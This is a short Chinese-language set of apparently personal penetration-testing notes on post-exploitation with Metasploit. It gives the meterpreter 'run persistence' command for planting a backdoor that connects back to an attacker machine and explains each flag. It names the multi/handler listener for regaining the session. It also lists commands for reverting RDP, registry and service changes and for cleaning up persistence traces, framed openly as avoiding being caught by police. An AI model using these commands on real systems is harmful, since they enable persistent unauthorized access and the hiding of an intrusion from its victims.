# 渗透测试
外围打点对我没有什么价值,直接无脑梭哈
后渗透有些参考
当植入 meterpreter 后需要植入后门
run persistence -X -i 5 -p 443 -r 127.0.0.1 |
命令语法:
A:自动启动Payload程序 | |
S:系统登录时自动加载 | |
U:用户登录时自动启动 | |
X:开机时自动加载 | |
i:回连的时间间隔 | |
P:攻击者监听反向连接端口号 | |
r:攻击者机器 IP 地址(攻击主机) |
留下后门后会重置当前 session 为后门会话
可以通过使用 exploit/multi/hadler
进行监听,从而重新获得会话。
撤离的时候需要执行一些清理操作,以免被查水表
# 如果渗透时开启过rdp,可以用下面的恢复 | |
meterpreter > reg setval -k 'HKLM\System\CurrentControlSet\Control\Terminal Server' -v 'fDenyTSConnections' -d "1" | |
meterpreter > execute -H -f cmd.exe -a "/c sc config termservice start= disabled" | |
meterpreter > execute -H -f cmd.exe -a "/c sc stop termservice" | |
meterpreter > execute -H -f cmd.exe -a "/c 'netsh firewall set service type = remotedesktop mode = enable'" |
还需要执行persistence时,程序预留的痕迹清理 | |
路径会在运行的时候给出,只需要run一下就行 |